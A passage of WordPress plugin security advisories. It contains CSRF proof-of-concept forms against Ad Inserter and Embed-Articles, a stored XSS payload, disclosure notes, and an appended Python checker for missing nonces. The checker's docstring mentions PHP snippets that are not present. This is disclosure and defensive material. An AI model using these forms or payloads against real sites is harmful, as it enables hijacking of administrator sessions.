      <input type="hidden" name="ad2_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad2_paragraph_text" value="" />
      <input type="hidden" name="ad2_paragraphNumber" value="0" />
      <input type="hidden" name="ad2_directionType" value="From Top" />
      <input type="hidden" name="ad2_excerptNumber" value="0" />
      <input type="hidden" name="ad2_enable_manual" value="0" />
      <input type="hidden" name="ad2_enable_php_call" value="0" />
      <input type="hidden" name="ad3_name" value="Block 3" />
      <input type="hidden" name="ad3_process_php" value="0" />
      <input type="hidden" name="ad3_data" value="" />
      <input type="hidden" name="ad3_displayType" value="None" />
      <input type="hidden" name="ad3_display_for_users" value="all" />
      <input type="hidden" name="ad3_display_for_devices" value="all" />
      <input type="hidden" name="ad3_floatType" value="None" />
      <input type="hidden" name="ad3_custom_css" value="" />
      <input type="hidden" name="ad3_widget_settings_post" value="0" />
      <input type="hidden" name="ad3_widget_settings_post" value="1" />
      <input type="hidden" name="ad3_widget_settings_page" value="0" />
      <input type="hidden" name="ad3_widget_settings_home" value="0" />
      <input type="hidden" name="ad3_widget_settings_home" value="1" />
      <input type="hidden" name="ad3_widget_settings_category" value="0" />
      <input type="hidden" name="ad3_widget_settings_category" value="1" />
      <input type="hidden" name="ad3_widget_settings_search" value="0" />
      <input type="hidden" name="ad3_widget_settings_search" value="1" />
      <input type="hidden" name="ad3_widget_settings_archive" value="0" />
      <input type="hidden" name="ad3_widget_settings_archive" value="1" />
      <input type="hidden" name="ad3_after_day" value="0" />
      <input type="hidden" name="ad3_general_tag" value="gadgets" />
      <input type="hidden" name="ad3_block_user" value="" />
      <input type="hidden" name="ad3_domain_list_type" value="Black List" />
      <input type="hidden" name="ad3_block_cat" value="" />
      <input type="hidden" name="ad3_block_cat_type" value="Black List" />
      <input type="hidden" name="ad3_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad3_paragraph_text" value="" />
      <input type="hidden" name="ad3_paragraphNumber" value="0" />
      <input type="hidden" name="ad3_directionType" value="From Top" />
      <input type="hidden" name="ad3_excerptNumber" value="0" />
      <input type="hidden" name="ad3_enable_manual" value="0" />
      <input type="hidden" name="ad3_enable_php_call" value="0" />
      <input type="hidden" name="ad4_name" value="Block 4" />
      <input type="hidden" name="ad4_process_php" value="0" />
      <input type="hidden" name="ad4_data" value="" />
      <input type="hidden" name="ad4_displayType" value="None" />
      <input type="hidden" name="ad4_display_for_users" value="all" />
      <input type="hidden" name="ad4_display_for_devices" value="all" />
      <input type="hidden" name="ad4_floatType" value="None" />
      <input type="hidden" name="ad4_custom_css" value="" />
      <input type="hidden" name="ad4_widget_settings_post" value="0" />
      <input type="hidden" name="ad4_widget_settings_post" value="1" />
      <input type="hidden" name="ad4_widget_settings_page" value="0" />
      <input type="hidden" name="ad4_widget_settings_home" value="0" />
      <input type="hidden" name="ad4_widget_settings_home" value="1" />
      <input type="hidden" name="ad4_widget_settings_category" value="0" />
      <input type="hidden" name="ad4_widget_settings_category" value="1" />
      <input type="hidden" name="ad4_widget_settings_search" value="0" />
      <input type="hidden" name="ad4_widget_settings_search" value="1" />
      <input type="hidden" name="ad4_widget_settings_archive" value="0" />
      <input type="hidden" name="ad4_widget_settings_archive" value="1" />
      <input type="hidden" name="ad4_after_day" value="0" />
      <input type="hidden" name="ad4_general_tag" value="gadgets" />
      <input type="hidden" name="ad4_block_user" value="" />
      <input type="hidden" name="ad4_domain_list_type" value="Black List" />
      <input type="hidden" name="ad4_block_cat" value="" />
      <input type="hidden" name="ad4_block_cat_type" value="Black List" />
      <input type="hidden" name="ad4_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad4_paragraph_text" value="" />
      <input type="hidden" name="ad4_paragraphNumber" value="0" />
      <input type="hidden" name="ad4_directionType" value="From Top" />
      <input type="hidden" name="ad4_excerptNumber" value="0" />
      <input type="hidden" name="ad4_enable_manual" value="0" />
      <input type="hidden" name="ad4_enable_php_call" value="0" />
      <input type="hidden" name="ad5_name" value="Block 5" />
      <input type="hidden" name="ad5_process_php" value="0" />
      <input type="hidden" name="ad5_data" value="" />
      <input type="hidden" name="ad5_displayType" value="None" />
      <input type="hidden" name="ad5_display_for_users" value="all" />
      <input type="hidden" name="ad5_display_for_devices" value="all" />
      <input type="hidden" name="ad5_floatType" value="None" />
      <input type="hidden" name="ad5_custom_css" value="" />
      <input type="hidden" name="ad5_widget_settings_post" value="0" />
      <input type="hidden" name="ad5_widget_settings_post" value="1" />
      <input type="hidden" name="ad5_widget_settings_page" value="0" />
      <input type="hidden" name="ad5_widget_settings_home" value="0" />
      <input type="hidden" name="ad5_widget_settings_home" value="1" />
      <input type="hidden" name="ad5_widget_settings_category" value="0" />
      <input type="hidden" name="ad5_widget_settings_category" value="1" />
      <input type="hidden" name="ad5_widget_settings_search" value="0" />
      <input type="hidden" name="ad5_widget_settings_search" value="1" />
      <input type="hidden" name="ad5_widget_settings_archive" value="0" />
      <input type="hidden" name="ad5_widget_settings_archive" value="1" />
      <input type="hidden" name="ad5_after_day" value="0" />
      <input type="hidden" name="ad5_general_tag" value="gadgets" />
      <input type="hidden" name="ad5_block_user" value="" />
      <input type="hidden" name="ad5_domain_list_type" value="Black List" />
      <input type="hidden" name="ad5_block_cat" value="" />
      <input type="hidden" name="ad5_block_cat_type" value="Black List" />
      <input type="hidden" name="ad5_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad5_paragraph_text" value="" />
      <input type="hidden" name="ad5_paragraphNumber" value="0" />
      <input type="hidden" name="ad5_directionType" value="From Top" />
      <input type="hidden" name="ad5_excerptNumber" value="0" />
      <input type="hidden" name="ad5_enable_manual" value="0" />
      <input type="hidden" name="ad5_enable_php_call" value="0" />
      <input type="hidden" name="ad6_name" value="Block 6" />
      <input type="hidden" name="ad6_process_php" value="0" />
      <input type="hidden" name="ad6_data" value="" />
      <input type="hidden" name="ad6_displayType" value="None" />
      <input type="hidden" name="ad6_display_for_users" value="all" />
      <input type="hidden" name="ad6_display_for_devices" value="all" />
      <input type="hidden" name="ad6_floatType" value="None" />
      <input type="hidden" name="ad6_custom_css" value="" />
      <input type="hidden" name="ad6_widget_settings_post" value="0" />
      <input type="hidden" name="ad6_widget_settings_post" value="1" />
      <input type="hidden" name="ad6_widget_settings_page" value="0" />
      <input type="hidden" name="ad6_widget_settings_home" value="0" />
      <input type="hidden" name="ad6_widget_settings_home" value="1" />
      <input type="hidden" name="ad6_widget_settings_category" value="0" />
      <input type="hidden" name="ad6_widget_settings_category" value="1" />
      <input type="hidden" name="ad6_widget_settings_search" value="0" />
      <input type="hidden" name="ad6_widget_settings_search" value="1" />
      <input type="hidden" name="ad6_widget_settings_archive" value="0" />
      <input type="hidden" name="ad6_widget_settings_archive" value="1" />
      <input type="hidden" name="ad6_after_day" value="0" />
      <input type="hidden" name="ad6_general_tag" value="gadgets" />
      <input type="hidden" name="ad6_block_user" value="" />
      <input type="hidden" name="ad6_domain_list_type" value="Black List" />
      <input type="hidden" name="ad6_block_cat" value="" />
      <input type="hidden" name="ad6_block_cat_type" value="Black List" />
      <input type="hidden" name="ad6_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad6_paragraph_text" value="" />
      <input type="hidden" name="ad6_paragraphNumber" value="0" />
      <input type="hidden" name="ad6_directionType" value="From Top" />
      <input type="hidden" name="ad6_excerptNumber" value="0" />
      <input type="hidden" name="ad6_enable_manual" value="0" />
      <input type="hidden" name="ad6_enable_php_call" value="0" />
      <input type="hidden" name="ad7_name" value="Block 7" />
      <input type="hidden" name="ad7_process_php" value="0" />
      <input type="hidden" name="ad7_data" value="" />
      <input type="hidden" name="ad7_displayType" value="None" />
      <input type="hidden" name="ad7_display_for_users" value="all" />
      <input type="hidden" name="ad7_display_for_devices" value="all" />
      <input type="hidden" name="ad7_floatType" value="None" />
      <input type="hidden" name="ad7_custom_css" value="" />
      <input type="hidden" name="ad7_widget_settings_post" value="0" />
      <input type="hidden" name="ad7_widget_settings_post" value="1" />
      <input type="hidden" name="ad7_widget_settings_page" value="0" />
      <input type="hidden" name="ad7_widget_settings_home" value="0" />
      <input type="hidden" name="ad7_widget_settings_home" value="1" />
      <input type="hidden" name="ad7_widget_settings_category" value="0" />
      <input type="hidden" name="ad7_widget_settings_category" value="1" />
      <input type="hidden" name="ad7_widget_settings_search" value="0" />
      <input type="hidden" name="ad7_widget_settings_search" value="1" />
      <input type="hidden" name="ad7_widget_settings_archive" value="0" />
      <input type="hidden" name="ad7_widget_settings_archive" value="1" />
      <input type="hidden" name="ad7_after_day" value="0" />
      <input type="hidden" name="ad7_general_tag" value="gadgets" />
      <input type="hidden" name="ad7_block_user" value="" />
      <input type="hidden" name="ad7_domain_list_type" value="Black List" />
      <input type="hidden" name="ad7_block_cat" value="" />
      <input type="hidden" name="ad7_block_cat_type" value="Black List" />
      <input type="hidden" name="ad7_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad7_paragraph_text" value="" />
      <input type="hidden" name="ad7_paragraphNumber" value="0" />
      <input type="hidden" name="ad7_directionType" value="From Top" />
      <input type="hidden" name="ad7_excerptNumber" value="0" />
      <input type="hidden" name="ad7_enable_manual" value="0" />
      <input type="hidden" name="ad7_enable_php_call" value="0" />
      <input type="hidden" name="ad8_name" value="Block 8" />
      <input type="hidden" name="ad8_process_php" value="0" />
      <input type="hidden" name="ad8_data" value="" />
      <input type="hidden" name="ad8_displayType" value="None" />
      <input type="hidden" name="ad8_display_for_users" value="all" />
      <input type="hidden" name="ad8_display_for_devices" value="all" />
      <input type="hidden" name="ad8_floatType" value="None" />
      <input type="hidden" name="ad8_custom_css" value="" />
      <input type="hidden" name="ad8_widget_settings_post" value="0" />
      <input type="hidden" name="ad8_widget_settings_post" value="1" />
      <input type="hidden" name="ad8_widget_settings_page" value="0" />
      <input type="hidden" name="ad8_widget_settings_home" value="0" />
      <input type="hidden" name="ad8_widget_settings_home" value="1" />
      <input type="hidden" name="ad8_widget_settings_category" value="0" />
      <input type="hidden" name="ad8_widget_settings_category" value="1" />
      <input type="hidden" name="ad8_widget_settings_search" value="0" />
      <input type="hidden" name="ad8_widget_settings_search" value="1" />
      <input type="hidden" name="ad8_widget_settings_archive" value="0" />
      <input type="hidden" name="ad8_widget_settings_archive" value="1" />
      <input type="hidden" name="ad8_after_day" value="0" />
      <input type="hidden" name="ad8_general_tag" value="gadgets" />
      <input type="hidden" name="ad8_block_user" value="" />
      <input type="hidden" name="ad8_domain_list_type" value="Black List" />
      <input type="hidden" name="ad8_block_cat" value="" />
      <input type="hidden" name="ad8_block_cat_type" value="Black List" />
      <input type="hidden" name="ad8_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad8_paragraph_text" value="" />
      <input type="hidden" name="ad8_paragraphNumber" value="0" />
      <input type="hidden" name="ad8_directionType" value="From Top" />
      <input type="hidden" name="ad8_excerptNumber" value="0" />
      <input type="hidden" name="ad8_enable_manual" value="0" />
      <input type="hidden" name="ad8_enable_php_call" value="0" />
      <input type="hidden" name="ad9_name" value="Block 9" />
      <input type="hidden" name="ad9_process_php" value="0" />
      <input type="hidden" name="ad9_data" value="" />
      <input type="hidden" name="ad9_displayType" value="None" />
      <input type="hidden" name="ad9_display_for_users" value="all" />
      <input type="hidden" name="ad9_display_for_devices" value="all" />
      <input type="hidden" name="ad9_floatType" value="None" />
      <input type="hidden" name="ad9_custom_css" value="" />
      <input type="hidden" name="ad9_widget_settings_post" value="0" />
      <input type="hidden" name="ad9_widget_settings_post" value="1" />
      <input type="hidden" name="ad9_widget_settings_page" value="0" />
      <input type="hidden" name="ad9_widget_settings_home" value="0" />
      <input type="hidden" name="ad9_widget_settings_home" value="1" />
      <input type="hidden" name="ad9_widget_settings_category" value="0" />
      <input type="hidden" name="ad9_widget_settings_category" value="1" />
      <input type="hidden" name="ad9_widget_settings_search" value="0" />
      <input type="hidden" name="ad9_widget_settings_search" value="1" />
      <input type="hidden" name="ad9_widget_settings_archive" value="0" />
      <input type="hidden" name="ad9_widget_settings_archive" value="1" />
      <input type="hidden" name="ad9_after_day" value="0" />
      <input type="hidden" name="ad9_general_tag" value="gadgets" />
      <input type="hidden" name="ad9_block_user" value="" />
      <input type="hidden" name="ad9_domain_list_type" value="Black List" />
      <input type="hidden" name="ad9_block_cat" value="" />
      <input type="hidden" name="ad9_block_cat_type" value="Black List" />
      <input type="hidden" name="ad9_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad9_paragraph_text" value="" />
      <input type="hidden" name="ad9_paragraphNumber" value="0" />
      <input type="hidden" name="ad9_directionType" value="From Top" />
      <input type="hidden" name="ad9_excerptNumber" value="0" />
      <input type="hidden" name="ad9_enable_manual" value="0" />
      <input type="hidden" name="ad9_enable_php_call" value="0" />
      <input type="hidden" name="ad10_name" value="Block 10" />
      <input type="hidden" name="ad10_process_php" value="0" />
      <input type="hidden" name="ad10_data" value="" />
      <input type="hidden" name="ad10_displayType" value="None" />
      <input type="hidden" name="ad10_display_for_users" value="all" />
      <input type="hidden" name="ad10_display_for_devices" value="all" />
      <input type="hidden" name="ad10_floatType" value="None" />
      <input type="hidden" name="ad10_custom_css" value="" />
      <input type="hidden" name="ad10_widget_settings_post" value="0" />
      <input type="hidden" name="ad10_widget_settings_post" value="1" />
      <input type="hidden" name="ad10_widget_settings_page" value="0" />
      <input type="hidden" name="ad10_widget_settings_home" value="0" />
      <input type="hidden" name="ad10_widget_settings_home" value="1" />
      <input type="hidden" name="ad10_widget_settings_category" value="0" />
      <input type="hidden" name="ad10_widget_settings_category" value="1" />
      <input type="hidden" name="ad10_widget_settings_search" value="0" />
      <input type="hidden" name="ad10_widget_settings_search" value="1" />
      <input type="hidden" name="ad10_widget_settings_archive" value="0" />
      <input type="hidden" name="ad10_widget_settings_archive" value="1" />
      <input type="hidden" name="ad10_after_day" value="0" />
      <input type="hidden" name="ad10_general_tag" value="gadgets" />
      <input type="hidden" name="ad10_block_user" value="" />
      <input type="hidden" name="ad10_domain_list_type" value="Black List" />
      <input type="hidden" name="ad10_block_cat" value="" />
      <input type="hidden" name="ad10_block_cat_type" value="Black List" />
      <input type="hidden" name="ad10_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad10_paragraph_text" value="" />
      <input type="hidden" name="ad10_paragraphNumber" value="0" />
      <input type="hidden" name="ad10_directionType" value="From Top" />
      <input type="hidden" name="ad10_excerptNumber" value="0" />
      <input type="hidden" name="ad10_enable_manual" value="0" />
      <input type="hidden" name="ad10_enable_php_call" value="0" />
      <input type="hidden" name="ad11_name" value="Block 11" />
      <input type="hidden" name="ad11_process_php" value="0" />
      <input type="hidden" name="ad11_data" value="" />
      <input type="hidden" name="ad11_displayType" value="None" />
      <input type="hidden" name="ad11_display_for_users" value="all" />
      <input type="hidden" name="ad11_display_for_devices" value="all" />
      <input type="hidden" name="ad11_floatType" value="None" />
      <input type="hidden" name="ad11_custom_css" value="" />
      <input type="hidden" name="ad11_widget_settings_post" value="0" />
      <input type="hidden" name="ad11_widget_settings_post" value="1" />
      <input type="hidden" name="ad11_widget_settings_page" value="0" />
      <input type="hidden" name="ad11_widget_settings_home" value="0" />
      <input type="hidden" name="ad11_widget_settings_home" value="1" />
      <input type="hidden" name="ad11_widget_settings_category" value="0" />
      <input type="hidden" name="ad11_widget_settings_category" value="1" />
      <input type="hidden" name="ad11_widget_settings_search" value="0" />
      <input type="hidden" name="ad11_widget_settings_search" value="1" />
      <input type="hidden" name="ad11_widget_settings_archive" value="0" />
      <input type="hidden" name="ad11_widget_settings_archive" value="1" />
      <input type="hidden" name="ad11_after_day" value="0" />
      <input type="hidden" name="ad11_general_tag" value="gadgets" />
      <input type="hidden" name="ad11_block_user" value="" />
      <input type="hidden" name="ad11_domain_list_type" value="Black List" />
      <input type="hidden" name="ad11_block_cat" value="" />
      <input type="hidden" name="ad11_block_cat_type" value="Black List" />
      <input type="hidden" name="ad11_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad11_paragraph_text" value="" />
      <input type="hidden" name="ad11_paragraphNumber" value="0" />
      <input type="hidden" name="ad11_directionType" value="From Top" />
      <input type="hidden" name="ad11_excerptNumber" value="0" />
      <input type="hidden" name="ad11_enable_manual" value="0" />
      <input type="hidden" name="ad11_enable_php_call" value="0" />
      <input type="hidden" name="ad12_name" value="Block 12" />
      <input type="hidden" name="ad12_process_php" value="0" />
      <input type="hidden" name="ad12_data" value="" />
      <input type="hidden" name="ad12_displayType" value="None" />
      <input type="hidden" name="ad12_display_for_users" value="all" />
      <input type="hidden" name="ad12_display_for_devices" value="all" />
      <input type="hidden" name="ad12_floatType" value="None" />
      <input type="hidden" name="ad12_custom_css" value="" />
      <input type="hidden" name="ad12_widget_settings_post" value="0" />
      <input type="hidden" name="ad12_widget_settings_post" value="1" />
      <input type="hidden" name="ad12_widget_settings_page" value="0" />
      <input type="hidden" name="ad12_widget_settings_home" value="0" />
      <input type="hidden" name="ad12_widget_settings_home" value="1" />
      <input type="hidden" name="ad12_widget_settings_category" value="0" />
      <input type="hidden" name="ad12_widget_settings_category" value="1" />
      <input type="hidden" name="ad12_widget_settings_search" value="0" />
      <input type="hidden" name="ad12_widget_settings_search" value="1" />
      <input type="hidden" name="ad12_widget_settings_archive" value="0" />
      <input type="hidden" name="ad12_widget_settings_archive" value="1" />
      <input type="hidden" name="ad12_after_day" value="0" />
      <input type="hidden" name="ad12_general_tag" value="gadgets" />
      <input type="hidden" name="ad12_block_user" value="" />
      <input type="hidden" name="ad12_domain_list_type" value="Black List" />
      <input type="hidden" name="ad12_block_cat" value="" />
      <input type="hidden" name="ad12_block_cat_type" value="Black List" />
      <input type="hidden" name="ad12_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad12_paragraph_text" value="" />
      <input type="hidden" name="ad12_paragraphNumber" value="0" />
      <input type="hidden" name="ad12_directionType" value="From Top" />
      <input type="hidden" name="ad12_excerptNumber" value="0" />
      <input type="hidden" name="ad12_enable_manual" value="0" />
      <input type="hidden" name="ad12_enable_php_call" value="0" />
      <input type="hidden" name="ad13_name" value="Block 13" />
      <input type="hidden" name="ad13_process_php" value="0" />
      <input type="hidden" name="ad13_data" value="" />
      <input type="hidden" name="ad13_displayType" value="None" />
      <input type="hidden" name="ad13_display_for_users" value="all" />
      <input type="hidden" name="ad13_display_for_devices" value="all" />
      <input type="hidden" name="ad13_floatType" value="None" />
      <input type="hidden" name="ad13_custom_css" value="" />
      <input type="hidden" name="ad13_widget_settings_post" value="0" />
      <input type="hidden" name="ad13_widget_settings_post" value="1" />
      <input type="hidden" name="ad13_widget_settings_page" value="0" />
      <input type="hidden" name="ad13_widget_settings_home" value="0" />
      <input type="hidden" name="ad13_widget_settings_home" value="1" />
      <input type="hidden" name="ad13_widget_settings_category" value="0" />
      <input type="hidden" name="ad13_widget_settings_category" value="1" />
      <input type="hidden" name="ad13_widget_settings_search" value="0" />
      <input type="hidden" name="ad13_widget_settings_search" value="1" />
      <input type="hidden" name="ad13_widget_settings_archive" value="0" />
      <input type="hidden" name="ad13_widget_settings_archive" value="1" />
      <input type="hidden" name="ad13_after_day" value="0" />
      <input type="hidden" name="ad13_general_tag" value="gadgets" />
      <input type="hidden" name="ad13_block_user" value="" />
      <input type="hidden" name="ad13_domain_list_type" value="Black List" />
      <input type="hidden" name="ad13_block_cat" value="" />
      <input type="hidden" name="ad13_block_cat_type" value="Black List" />
      <input type="hidden" name="ad13_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad13_paragraph_text" value="" />
      <input type="hidden" name="ad13_paragraphNumber" value="0" />
      <input type="hidden" name="ad13_directionType" value="From Top" />
      <input type="hidden" name="ad13_excerptNumber" value="0" />
      <input type="hidden" name="ad13_enable_manual" value="0" />
      <input type="hidden" name="ad13_enable_php_call" value="0" />
      <input type="hidden" name="ad14_name" value="Block 14" />
      <input type="hidden" name="ad14_process_php" value="0" />
      <input type="hidden" name="ad14_data" value="" />
      <input type="hidden" name="ad14_displayType" value="None" />
      <input type="hidden" name="ad14_display_for_users" value="all" />
      <input type="hidden" name="ad14_display_for_devices" value="all" />
      <input type="hidden" name="ad14_floatType" value="None" />
      <input type="hidden" name="ad14_custom_css" value="" />
      <input type="hidden" name="ad14_widget_settings_post" value="0" />
      <input type="hidden" name="ad14_widget_settings_post" value="1" />
      <input type="hidden" name="ad14_widget_settings_page" value="0" />
      <input type="hidden" name="ad14_widget_settings_home" value="0" />
      <input type="hidden" name="ad14_widget_settings_home" value="1" />
      <input type="hidden" name="ad14_widget_settings_category" value="0" />
      <input type="hidden" name="ad14_widget_settings_category" value="1" />
      <input type="hidden" name="ad14_widget_settings_search" value="0" />
      <input type="hidden" name="ad14_widget_settings_search" value="1" />
      <input type="hidden" name="ad14_widget_settings_archive" value="0" />
      <input type="hidden" name="ad14_widget_settings_archive" value="1" />
      <input type="hidden" name="ad14_after_day" value="0" />
      <input type="hidden" name="ad14_general_tag" value="gadgets" />
      <input type="hidden" name="ad14_block_user" value="" />
      <input type="hidden" name="ad14_domain_list_type" value="Black List" />
      <input type="hidden" name="ad14_block_cat" value="" />
      <input type="hidden" name="ad14_block_cat_type" value="Black List" />
      <input type="hidden" name="ad14_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad14_paragraph_text" value="" />
      <input type="hidden" name="ad14_paragraphNumber" value="0" />
      <input type="hidden" name="ad14_directionType" value="From Top" />
      <input type="hidden" name="ad14_excerptNumber" value="0" />
      <input type="hidden" name="ad14_enable_manual" value="0" />
      <input type="hidden" name="ad14_enable_php_call" value="0" />
      <input type="hidden" name="ad15_name" value="Block 15" />
      <input type="hidden" name="ad15_process_php" value="0" />
      <input type="hidden" name="ad15_data" value="" />
      <input type="hidden" name="ad15_displayType" value="None" />
      <input type="hidden" name="ad15_display_for_users" value="all" />
      <input type="hidden" name="ad15_display_for_devices" value="all" />
      <input type="hidden" name="ad15_floatType" value="None" />
      <input type="hidden" name="ad15_custom_css" value="" />
      <input type="hidden" name="ad15_widget_settings_post" value="0" />
      <input type="hidden" name="ad15_widget_settings_post" value="1" />
      <input type="hidden" name="ad15_widget_settings_page" value="0" />
      <input type="hidden" name="ad15_widget_settings_home" value="0" />
      <input type="hidden" name="ad15_widget_settings_home" value="1" />
      <input type="hidden" name="ad15_widget_settings_category" value="0" />
      <input type="hidden" name="ad15_widget_settings_category" value="1" />
      <input type="hidden" name="ad15_widget_settings_search" value="0" />
      <input type="hidden" name="ad15_widget_settings_search" value="1" />
      <input type="hidden" name="ad15_widget_settings_archive" value="0" />
      <input type="hidden" name="ad15_widget_settings_archive" value="1" />
      <input type="hidden" name="ad15_after_day" value="0" />
      <input type="hidden" name="ad15_general_tag" value="gadgets" />
      <input type="hidden" name="ad15_block_user" value="" />
      <input type="hidden" name="ad15_domain_list_type" value="Black List" />
      <input type="hidden" name="ad15_block_cat" value="" />
      <input type="hidden" name="ad15_block_cat_type" value="Black List" />
      <input type="hidden" name="ad15_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad15_paragraph_text" value="" />
      <input type="hidden" name="ad15_paragraphNumber" value="0" />
      <input type="hidden" name="ad15_directionType" value="From Top" />
      <input type="hidden" name="ad15_excerptNumber" value="0" />
      <input type="hidden" name="ad15_enable_manual" value="0" />
      <input type="hidden" name="ad15_enable_php_call" value="0" />
      <input type="hidden" name="ad16_name" value="Block 16" />
      <input type="hidden" name="ad16_process_php" value="0" />
      <input type="hidden" name="ad16_data" value="" />
      <input type="hidden" name="ad16_displayType" value="None" />
      <input type="hidden" name="ad16_display_for_users" value="all" />
      <input type="hidden" name="ad16_display_for_devices" value="all" />
      <input type="hidden" name="ad16_floatType" value="None" />
      <input type="hidden" name="ad16_custom_css" value="" />
      <input type="hidden" name="ad16_widget_settings_post" value="0" />
      <input type="hidden" name="ad16_widget_settings_post" value="1" />
      <input type="hidden" name="ad16_widget_settings_page" value="0" />
      <input type="hidden" name="ad16_widget_settings_home" value="0" />
      <input type="hidden" name="ad16_widget_settings_home" value="1" />
      <input type="hidden" name="ad16_widget_settings_category" value="0" />
      <input type="hidden" name="ad16_widget_settings_category" value="1" />
      <input type="hidden" name="ad16_widget_settings_search" value="0" />
      <input type="hidden" name="ad16_widget_settings_search" value="1" />
      <input type="hidden" name="ad16_widget_settings_archive" value="0" />
      <input type="hidden" name="ad16_widget_settings_archive" value="1" />
      <input type="hidden" name="ad16_after_day" value="0" />
      <input type="hidden" name="ad16_general_tag" value="gadgets" />
      <input type="hidden" name="ad16_block_user" value="" />
      <input type="hidden" name="ad16_domain_list_type" value="Black List" />
      <input type="hidden" name="ad16_block_cat" value="" />
      <input type="hidden" name="ad16_block_cat_type" value="Black List" />
      <input type="hidden" name="ad16_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad16_paragraph_text" value="" />
      <input type="hidden" name="ad16_paragraphNumber" value="0" />
      <input type="hidden" name="ad16_directionType" value="From Top" />
      <input type="hidden" name="ad16_excerptNumber" value="0" />
      <input type="hidden" name="ad16_enable_manual" value="0" />
      <input type="hidden" name="ad16_enable_php_call" value="0" />
      <input type="hidden" name="adH_process_php" value="0" />
      <input type="hidden" name="adH_data" value="" />
      <input type="hidden" name="adH_enable" value="0" />
      <input type="hidden" name="adF_process_php" value="0" />
      <input type="hidden" name="adF_data" value="" />
      <input type="hidden" name="adF_enable" value="0" />
      <input type="hidden" name="syntax-highlighter-theme" value="ad_inserter" />
      <input type="hidden" name="block-class-name" value="code-block" />
      <input type="hidden" name="ai-active-tab" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
 
Mitigation 
==========
Update to Latest version 1.5.3
 
Change Log
==========
https://wordpress.org/plugins/ad-inserter/changelog/
 
Disclosure 
==========
18-April-2015 Reported to Developer
2-May-2015 Fixed by Developer

Credits
=======
* Kaustubh Padwad 
* Information Security Researcher
* kingkaustubh (at) me (dot) com 
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad

9 May 2015

WordPress Embed-Articles 7.0.3 CSRF / XSS

======================================================
CSRF/Stored XSS Vulnerability in embed articles Plugin
======================================================
 
 
.. contents:: Table of Contents
 
Overview
========
 
* Title: CSRF and Stored XSS Vulnerability in embed-articles WordPress Plugin
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/embed-articles/
* Severity: HIGH
* Version Affected: Version 7.0.3 and most likely prior versions
* Version Tested: Version 7.0.3
* Version Patched: none (plugin closed)
 
Description 
===========
 
Vulnerable Parameter 
--------------------
 
* API Key
 
About Vulnerability
-------------------
This plugin is vulnerable to a combined CSRF/XSS attack: if an admin user can be tricked into visiting a crafted page controlled by the attacker (via spear phishing or social engineering), the attacker can store arbitrary script in the plugin's settings, and that script then executes on the admin page. Once exploited, the admin's browser can be made to do almost anything the admin user could normally do, for example by hijacking the admin's cookies.
 
Vulnerability Class
=================== 
Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))
 
Steps to Reproduce: (POC)
=========================
 
After installing the plugin:

1. Go to Settings -> Embed Articles.

2. Insert the payload ## "> http://www.<script>alert(1)</script .com ## into the vulnerable parameter named above (API Key), save the settings and watch the XSS fire.

3. Visit the embed-articles settings page at any later time: the script executes again because it is stored.

The plugin does not use any nonces, so the same settings can be changed through a CSRF attack; the PoC code for that is below.
 
CSRF POC Code
=============
<html>
  <body>
    <form action="http://127.0.0.1/wp/wp-admin/admin.php?page=embedarticles&lock=no" method="POST">
      <input type="hidden" name="embedarticles_hidden" value="Y" />
      <input type="hidden" name="pub_value" value="&quot;&gt; http://www.&lt;script&gt;alert(1)&lt;/script .com" />
      <input type="hidden" name="display" value="bottom" />
      <input type="hidden" name="Submit" value="Update Options" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
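The Ad Inserter PoC form earlier on this page and the Embed-Articles PoC form above both work for the same reason: a settings handler that writes options straight from $_POST with no nonce and no capability check. One quick way to triage a plugin for that defect before building a PoC is a source-level heuristic. The following Python is an added example, not code from either advisory or either plugin; the two PHP snippets embedded in it are constructed to mirror the vulnerable and the hardened shape of such a handler, and the function, option and nonce names in them are invented for illustration. It flags functions that reach a state-changing WordPress sink from request data without check_admin_referer()/wp_verify_nonce() or without current_user_can().

```python
"""Heuristic audit of WordPress settings handlers for the CSRF pattern above.

Added example, not code from the advisories or from either plugin. The two PHP
snippets are constructed to mirror what the Ad Inserter and Embed-Articles PoC
forms rely on: a handler that writes options straight from $_POST with no nonce
and no capability check. Function, option and nonce names are invented.
"""
import re

# Any one of these verifies a WordPress nonce and defeats a plain cross-site POST.
NONCE_CHECKS = ("check_admin_referer(", "wp_verify_nonce(", "check_ajax_referer(")
# State-changing sinks a forged request would reach.
SINKS = ("update_option(", "add_option(", "wp_update_comment(", "move_uploaded_file(")
REQUEST_INPUT = re.compile(r"\$_(POST|GET|REQUEST|FILES)\b")
FUNC_HEADER = re.compile(r"function\s+(\w+)\s*\([^)]*\)\s*\{")


def function_bodies(php):
    """Yield (name, body) for each PHP function by counting braces from its header.
    Braces inside string literals are not special-cased; good enough for triage."""
    for m in FUNC_HEADER.finditer(php):
        depth, i = 1, m.end()
        while i < len(php) and depth:
            depth += {"{": 1, "}": -1}.get(php[i], 0)
            i += 1
        yield m.group(1), php[m.end():i - 1]


def audit_handlers(php):
    """Return [(function, issue)] for functions that write state from request data
    without a nonce check and/or without a capability check."""
    findings = []
    for name, body in function_bodies(php):
        if not REQUEST_INPUT.search(body) or not any(s in body for s in SINKS):
            continue  # no request-driven write here, nothing to forge
        if not any(c in body for c in NONCE_CHECKS):
            findings.append((name, "no nonce verification (CSRF)"))
        if "current_user_can(" not in body:
            findings.append((name, "no capability check"))
    return findings


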